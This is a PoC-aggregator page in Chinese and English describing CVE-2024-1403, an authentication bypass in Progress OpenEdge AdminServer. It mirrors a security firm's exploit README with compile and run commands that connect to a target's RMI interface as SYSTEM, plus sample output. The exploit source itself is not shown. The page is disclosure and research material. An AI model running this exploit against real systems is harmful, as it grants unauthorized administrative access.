POC详情: 712a453968d563cbbf99f3bece9f8e2db7009a42

来源
关联漏洞
标题: Progress Software OpenEdge Authentication Gateway 安全漏洞 (CVE-2024-1403)
描述:Progress Software OpenEdge Authentication Gateway是Progress Software公司的一个用于在OpenEdge环境中提供身份验证服务。 Progress Software OpenEdge Authentication Gateway 存在安全漏洞,该漏洞源于存在身份验证绕过漏洞。受影响的产品和版本:OpenEdge Authentication Gateway and AdminServer 11.7.19之前版本,12.2.14之前版本,12.8
描述
Progress OpenEdge Authentication Bypass
介绍
# CVE-2024-1403 Progress OpenEdge Authentication Bypass
An exploit proof of concept for Progress OpenEdge CVE-2024-1403.

## Blog Post
More details here:
[https://www.horizon3.ai/attack-research/cve-2024-1403-progress-openedge-authentication-bypass-deep-dive](https://www.horizon3.ai/attack-research/cve-2024-1403-progress-openedge-authentication-bypass-deep-dive)

## Usage
You must provide your own versions of the following jars:
- `progress.jar`
- `oeauth-12.8.-.jar`
- `osmetrics.jar`
- `juniper.jar`

### Compilation
```
$ javac -cp progress.jar:oeauth-12.8.0.jar Main.java

```
### Usage
Running this script will attempt to connect to the `AdminServer` RMI interface using the `NT AUTHORITY\SYSTEM` credential.
```
$ java -cp progress.jar:oeauth-12.8.0.jar:osmetrics.jar:juniper.jar:. Main <target_ip>
com.progress.system.SystemPlugIn
	com.progress.chimera.common.IChimeraRemoteObject
	com.progress.system.ISystemPlugIn

com.progress.agent.database.AgentPlugIn
	com.progress.chimera.common.IChimeraRemoteObject
	com.progress.agent.database.IAgentPlugIn

com.progress.ubroker.tools.NSRemoteObject
	com.progress.chimera.common.IChimeraHierarchy
	com.progress.ubroker.tools.IYodaRMI
	com.progress.ubroker.tools.IYodaSharedResources

com.progress.ubroker.tools.UBRemoteCommand
	com.progress.chimera.common.IChimeraRemoteCommand

com.progress.juniper.admin.JAPlugIn
	com.progress.chimera.common.IChimeraRemoteObject
	com.progress.juniper.admin.IJAPlugIn

com.progress.agent.smdatabase.SMPlugIn
	com.progress.chimera.common.IChimeraRemoteObject
```

## Follow the Horizon3.ai Attack Team on Twitter for the latest security research:
*  [Horizon3 Attack Team](https://twitter.com/Horizon3Attack)
*  [James Horseman](https://twitter.com/JamesHorseman2)
*  [Zach Hanley](https://twitter.com/hacks_zach)

## Disclaimer
This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.
文件快照

[4.0K] /data/pocs/712a453968d563cbbf99f3bece9f8e2db7009a42 ├── [1.6K] Main.java └── [2.1K] README.md 0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。